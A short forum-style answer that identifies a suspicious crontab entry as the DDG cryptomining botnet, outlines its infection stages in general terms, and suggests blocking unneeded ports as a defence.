Suspicious crontab entry running 'xribfa4' every 15 minutes

It is a DDG mining botnet , how it work :

  1. exploiting an RCE vulnerability
  2. modifying the crontab
  3. downloading the appropriate mining program (written with go)
  4. starting the mining process

DDG: A Mining Botnet Aiming at Database Servers

SystemdMiner when a botnet borrows another botnet’s infrastructure

U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)


Figure out which TCP and UDP ports are actually needed, and then block all of the other ports in your router's firewall. Possibly, those crontab entries will not reappear.

You can see which ports are open and public by using the Shields Up! feature at grc.com.